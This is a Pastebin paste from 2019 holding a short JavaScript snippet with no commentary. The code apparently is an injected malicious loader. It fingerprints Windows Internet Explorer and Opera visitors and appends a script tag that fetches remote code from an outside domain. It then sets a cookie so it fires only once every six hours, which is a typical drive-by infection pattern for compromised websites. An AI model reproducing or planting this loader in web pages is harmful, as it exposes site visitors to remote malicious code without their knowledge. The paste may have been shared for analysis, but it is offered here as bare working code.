Advertisement
Guest User

Untitled

a guest
Mar 8th, 2019
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if (document.cookie.search(new RegExp(document.location.host)) == -1) {
  2.     if (/(Windows)/.test(navigator.userAgent) && /(MSIE|Opera|Trident)/.test(navigator.userAgent)) {
  3.         try {
  4.             var scriptElement = document.createElement('script');
  5.             scriptElement.sync = 1;
  6.             try {
  7.                 document['body']['appendChild'](scriptElement);
  8.             } catch (e) {
  9.                 try {
  10.                     document.write('<body>');
  11.                     document.body.appendChild(scriptElement);
  12.                 } catch (e) {}
  13.             }
  14.  
  15.             scriptElement.src = 'http://designalive.pl/includes/js/script.js?_KCh=95874';
  16.         } catch (e) {};
  17.     }
  18.     document.cookie = document.locastion.host + '=true;max-age=21600;path=/';
  19. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement